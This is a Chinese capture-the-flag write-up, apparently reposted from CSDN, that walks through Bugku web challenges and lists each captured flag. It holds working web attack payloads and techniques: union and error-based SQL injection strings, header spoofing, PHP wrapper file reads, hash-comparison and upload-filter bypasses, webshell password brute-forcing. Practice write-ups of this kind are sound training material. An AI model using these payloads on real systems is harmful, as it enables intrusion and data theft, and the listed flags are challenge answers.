0x00 web2
直接F12拿到flag
KEY{Web-2-bugKssNNikls9100}
0x01 计算器
F12修改maxlength=2得到flag
flag{CTF-bugku-0032}
0x02 web基础$_GET
提交GET参数?what=flag得到flag
flag{bugku_get_su8kej2en}
0x03 web基础$_POST
提交POST参数what=flag得到flag
flag{bugku_get_ssseint67se}
0x04 矛盾
num不能是纯数字且等于1,构造payload:num=1/1得到flag
flag{bugku-789-ps-ssdf}
0x05 web3
禁用js之后F12查看源码,里面有一串Unicode,解码得到flag
KEY{J2sa42ahJK-HS11III}
0x06 域名解析
本地路径C:\Windows\System32\drivers\etc,解析一下再访问flag.baidu.com得到flag
KEY{DSAHDSJ82HDS2211}
0x07 你必须让他停下
抓包send to Repeater 一直go直到flag出现
flag{dummy_game_1s_s0_popular}
0x08 变量1
var_dump($$args) 将$GLOBALS数组中存放的所有变量以数组方式输出
构造index1.php?args=$GLOBALS拿到flag
flag{92853051ab894a64f7865cf3c2128b34}
0x09 web5
把源码里那段jspfuck丢进控制台再转成大写得到flag
CTF{WHATFK}
0x0A 头等舱
抓包丢进Repeater里Go一下,flag在Response里
flag{Bugku_k8_23s_istra}
0x0B 网站被黑
御剑扫后台扫出一个shell.php,爆破得到密码为hack
flag{hack_bug_ku035}
0x0C 管理员系统
F12在最下面base64解码得到密码为test123,抓包添加X-Forwarded-For:127.0.0.1得到flag
flag{85ff2ee4171396724bae20c0bd851f6b}
0x0D web4
源代码里的东西urldecode拼接一下就得到a.value,提交得到flag
KEY{J22JK-HS11}
0x0E flag在index里
php伪协议读取index.php
flag{edulcni_elif_lacol_si_siht}
0x0F 备份是个好习惯
源码在index.php.bak,一道md5碰撞题。
key可以双写绕过,md()函数无法处理数组,传入数组返回null
或者利用==比较漏洞,md5加密后的值为0exxx会被认为是0的xxx次方
Bugku{OH_YOU_FIND_MY_MOMY}
0x10 成绩单
无任何过滤的sql注入
Payload:-1' union select 1,2,3,skctf_flag from fl4g#
BUGKU{Sql_INJECT0N_4813drd8hz4}
0x11 秋名山老司机
import requests
import re
url = 'http://123.206.87.240:8002/qiumingshan/'
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data = post).text)
Bugku{YOU_DID_IT_BY_SECOND}
0x12 速度要快
import requests
import base64
url="http://120.24.86.145:8002/web6/"
r=requests.session()
headers=r.get(url).headers
mid=base64.b64decode(headers['flag'])
mid=mid.decode()
flag = base64.b64decode(mid.split(':')[1])
data={'margin':flag}
print (r.post(url,data).text)
KEY{111dd62fcd377076be18a}
0x13 never give up
urldecode->base64decode->urldecode得到源码
直接看f4l2a3g.txt就拿到flag了
flag{tHis_iS_THe_fLaG}
0x14 字符?正则?
Payload:http://123.206.87.240:8002/web10/?id=keykeyaaaakey:/a/keya:
KEY{0x0SIOPh550afc}
0x15 前女友
md5碰撞
SKCTF{Php_1s_tH3_B3St_L4NgUag3}
0x16 login1
sql约束攻击
SKCTF{4Dm1n_HaV3_GreAt_p0w3R}
0x17 你从哪里来
referer:https://www.google.com
flag{bug-ku_ai_admin}
0x18 md5 collision
还是md5碰撞
flag{md5_collision_is_easy}
0x19 程序员本地网站
X-Forwarded-For:127.0.0.1
flag{loc-al-h-o-st1}
0x1A 各种绕过
sha1碰撞,传数组进去返回null
**flag{HACK_45hhs_213sDD} **
0x1B web8
file_get_contents() 函数把整个文件读入一个字符串中
ac为flag.txt的内容,fn为flag.txt
flag{3cfb7a90fc0de31}
0x1C 细心
robots.txt下告诉我们有个resusl.php,传个x=admin就能拿到flag
flag(ctf_0098_lkji-s)
0x1D 求getshell
php5绕过+MIME+Content-type大小写绕过
php5这个后缀名bp fuzzing一下就出flag了
KEY{bb35dc123820e}
0x1E INSERT INTO注入
xff头时间盲注,python脚本跑一遍
flag{cdbf14c9551d5be5612f7bb5d2867853}
0x1F 多次
and、or、union、select都被过滤了,需要双写绕过
flag1是错的,爆flag1里的address得到下一关地址
payload:?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23
flag{Bugku-sql_6s-2i-4t-bug}
0x20 flag.php
key最开始为定义,所以为NULL。构造Cookie: ISecer = s:0:"";得到flag
flag{unserialize_by_virink}
0x21 sql注入2
.DS_Store文件泄露,web2/flag打开就是了。盲注要复杂些
flag{sql_iNJEct_comMon3600!}
0x22 Trim的日记本
目录扫描,flag在show.php
flag1:{0/m9o9PDtcSyu7Tt}
The end
好多题因为各种各样的原因挂掉了,挺可惜的
这份wp主要是为了整理一下web题的思路,需要有一定基础才能看懂
来源:CSDN
作者:0xdawn
链接:https://blog.csdn.net/weixin_43872099/article/details/104508180